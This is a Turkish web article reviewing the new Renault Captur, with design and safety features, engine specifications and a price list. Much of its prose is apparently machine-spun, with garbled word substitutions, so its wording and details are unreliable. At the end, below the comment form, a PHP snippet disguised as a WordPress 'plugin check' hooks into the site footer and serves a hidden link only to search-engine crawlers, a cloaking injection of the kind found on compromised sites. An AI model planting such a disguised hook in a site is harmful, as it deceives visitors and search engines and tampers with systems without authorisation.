Sıradaki içerik:

Makyajlanan Subaru XV Türkiye'ye Geldi

e
sv

Renault Captur Fiyat Listesi ve Dikkat Çeken Özellikleri

06 Aralık 2020 18:32
avatar

 • e 0

  Mutlu

 • e 0

  Eğlenmiş

 • e 0

  Şaşırmış

 • e 0

  Kızgın

 • e 0

  Üzgün

Renault, B segmentine ait Crossover aracı olan Captur modelini tamamen yenileyerek satışa çıkardı. Renault Captur’ün ilk serisi, 2012 yılında çıkmıştı ve vasıta piyasaya sürüldüğü andan itibaren aka ilgi gördü. Bu kadar ilgi gören bir araçta uzun zamandır yenilik yapmayan Renault, sonunda aka değişikliklere imza atarak yeni versiyonunu çıkarmış oldu.

Renault Captur, hem tasarımı hem de sahip olduğu donanımlar sayesinde bilhassa belde aracı olarak herkesi memnun edecek türden bir otomobil. Dilerseniz Renault Captur’de yapılan değişikliklere, aracın sahip olduğu donanımlara ve eder listesine daha yakından bakalım. 

Tasarım

Dış tasarım 

yeni renault capture 2020

Renault Captur model aracın tasarımı tamamen değişmiş durumda ve aracın gövdesi de 11 cm uzatılarak hem sürücüye hem de yolculara daha geniş bir konfor alanı sunulmuş. Renault Captur, C formunda kullanılan far grubu ve alt tampona yerleştirilmiş işlevsel havalandırmalar ile beraber markanın bir öbür modeli olan yeni Renault Clio ile son radde benzerlik gösteriyor. 

Geniş havalandırma ızgaraları ve ızgaranın hemen altında bulunan aleni renkli çıkıntı, araca Crossover görünümünü kazandıran en önemli detaylardan birisi olmuş. Aracın hem sportif görünmesini hem de B-SUV Crossover kimliğini pekiştirmesini sağlayan bir öbür detayın ise yan çamurlukların üzerinde konumlandırılmış plakalar olduğunu söyleyebiliriz. 

renault captur arkası

Aracın geri kısmında yeni bagaj kapağına doğru uzanan C formundaki far grubu, açıkçası araca son radde şık bir manzara kazandırmış. Ön tamponda kullanılan aleni renkli çıkıntı, aracın geri alt tamponunda da kullanılmış ve bu da göze gerçekten hitap eden bir bütünlüğün ortaya çıkmasını sağlamış.

İç tasarım

renault captur iç mekan

Aracın iç kısmı da dışı olduğu kadar gerçekten aka değişikliğe uğramış. Kendini en fazla belli eden değişikliklerden birisi, vasıta içerisinde kullanılan malzemeler olmuş. Captur’ün ilk serisinde ve hatta çoğu B segmentine ait arabada umumi olarak sert plastik kullanılmış olsa da, yeni Renault Captur modelde genellikle löp plastik kullanılarak sofistike bir manzara elde edilmiş.

Klima havalandırmalarının yanlarında kullanılan Piano Black renginde malzemeler, Renault Captur’ün iç kısmında gerçekten de premium bir havaya sahip olmasını sağlamış. Açıkçası Renault Captur, ilk serisiyle kıyaslandığı zaman sanki serinin devamı değil de yepyeni bir arabaymış gibi görünüyor. 

Teknolojik özellikler

Multimedya ekranı

renault captur kokpit

Renault Capture içerisinde 7 inç boyutlarında dokunmatik bir multimedya ekranına sahip. Araçta opsiyonel olarak 9,3 inçlik dikey EasyLink multimedya ekranının da satın alınabileceğini söyleyelim. 

Kablosuz şarj özelliği

renault captur iç mekanı

Araç, birçok yeni model arabada aranılan bir özellik olan kablosuz şarj özelliğine sahip. Normalde daha üst segmentlere ait araçlarda bu özelliği görmeye alıştık ancak Renault’nun bu özelliği standart olarak sunması son radde yararlı olmuş. 

Apple CarPlay

renault captur easylink multimedya ekranı

Renault Captur’ün Easy Link sistemi, Apple CarPlay ve Android Auto’yu destekliyor ve bu sayede hem Android hem de iOS işletim sistemine sahip akıllı telefonlarınızı arabayla kolayca entegre edebiliyorsunuz. 

Güvenlik

Kör nokta uyarı sistemi

renault captur kör nokta uyarı sistemi

Renault Captur, emniyet önlemi olarak artık her araçta bulunması gereken bir özellik olan kör nokta uyarı sistemine sahip. Araç, kör noktada bulunan bir öbür aracı tespit ettiği zaman sürücüyü yan aynalarda konumlandırılmış fer göstergelerini kullanarak uyarıyor. 

Şerit takip sistemi

renault captur şerit takip asistanı

Şerit takip sistemi genellikle dalgınlık yüzünden sürücünün bulunduğu şeritten sapmaması için tasarlanmış. Captur, sürücü sinyal vermeden şerit değiştirdiği takdirde sürücüyü hem görsel hem de sesli bir şekilde uyarıyor.

360 radde kamera

renault captur 360 radde kuş bakışı

Renault Captur, üzerinde bulunan geniş açılı 4 kamera sayesinde gelen görüntüleri birleştirip sürücüye 360 derecelik bir kuş bakışı görünümü sağlıyor. Sürücü gerek park gerekse sürüş sırasında bu kameraları kullanarak arabanın çevresinde olan biten her şeye daha yargıç olabiliyor. 

Renault Captur motorları, performansı ve yakıt tüketimi

renault captur renk seçenekleri

Renault Captur, 3 benzinli ve 2 dizel olmak üzere 5 farklı motor seçeneğiyle karşımıza çıkıyor. Birçok marka, otomobillere uygulanan vergilerden ötürü farklı motor ve şanzıman türlerini Türkiye’ye getirmekten kaçınır hale geldi. Açıkçası Renault Captur’ün aynı prensini takip etmeyerek müşteriye geniş bir yelpaze sunması aka bir avantaj olmuş. Dilerseniz Captur’ün sahip olduğu motorlara daha yakından bakalım.

1.0 TCe 5 ileri manuel

renault captur sürüş

Motor tipi: 3 silindir benzinliBeygir: 100 hpMaksimum hız: 173 km0-100 km hızlanma: 13,3 saniyeŞehir içi yakıt tüketimi: 6,1 – 6,3 ltŞehir dışı yakıt tüketimi: 4,6 ltOrtalama yakıt tüketimi: 5,1 – 5,3 lt

1.3 TCe EDC 7 ileri otomatik

yeni renault captur beyaz

Motor tipi: 4 silindir benzinliBeygir: 130 hpMaksimum hız: 193 km0-100 km hızlanma: 9,6 saniyeŞehir içi yakıt tüketimi: 7,5 ltŞehir dışı yakıt tüketimi: 5,1 ltOrtalama yakıt tüketimi: 5,5 – 5,6 lt

1.3 TCe EDC 7 ileri otomatik

renault captur tasarımı

Motor tipi: 4 silindir benzinliBeygir: 155 hpMaksimum hız: 202 km0-100 km hızlanma: 8,6 saniyeŞehir içi yakıt tüketimi: 7,3 – 7,5 ltŞehir dışı yakıt tüketimi: 4,8 – 5,0 ltOrtalama yakıt tüketimi: 5,3 – 5,5 lt

1.5 Blue dCi 6 ileri manuel

yeni renault captur renkleri

Motor tipi: 4 silindir dizelBeygir: 95 hpMaksimum hız: 178 km0-100 km hızlanma: 14,3 saniyeŞehir içi yakıt tüketimi: 4,6 ltŞehir dışı yakıt tüketimi: 3,7 – 3,8 ltOrtalama yakıt tüketimi: 4,0 – 4,1 lt

1.5 Blue dCi EDC 7 ileri otomatik

yeni renault captur mavi

Motor tipi: 4 silindir dizelBeygir: 115 hpMaksimum hız: 186 km0-100 km hızlanma: 11,0 saniyeŞehir içi yakıt tüketimi: 4,4 – 4,5 ltŞehir dışı yakıt tüketimi: 3,8 – 4,0 ltOrtalama yakıt tüketimi: 4,1 – 4,2 lt

Renault Captur eder listesi

yeni renault captur kırmızı

Joy 1.0 TCe 211.900 ₺Joy 1.3 TCe EDC 292.900 ₺Joy 1.5 Blue dCi 294.900 ₺Touch 1.3 TCe EDC 304.900 ₺Touch 1.5 Blue dCi EDC 325.900 ₺Icon 1.3 TCe EDC 325.900 ₺Icon 1.3 TCe EDC 329.900 ₺Icon 1.5 Blue dCi EDC 346.900 ₺

Renault Captur model aracın sahip olduğu özellikleri ve eder listesini hep beraber inceledik. Bir Crossover aracı olarak tasarlana Captur’ün aslında daha fazla şehir aracı olarak amel gördüğünü söyleyebiliriz. Ancak aracın B segmentinde olmasına rağmen sahip olduğu 422 litrelik bagaj hacmi, Captur’ü uzun yolculuklarda da son radde kullanışlı bir araba haline getirmiş.  

Şu anda aracın rakipleri arasında Peugeot 2008, Honda HRV, Audi Q2 ve DS3 Crossback gibi gene B-SUV modeller bulunuyor. Captur’ün yeni tasarımı ve yeni donanımlarıyla rakiplerinden öne geçip geçmeyeceğini ileride hep beraber göreceğiz. Yeni Renault Captur hakkında sizler neler düşünüyorsunuz?

 • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');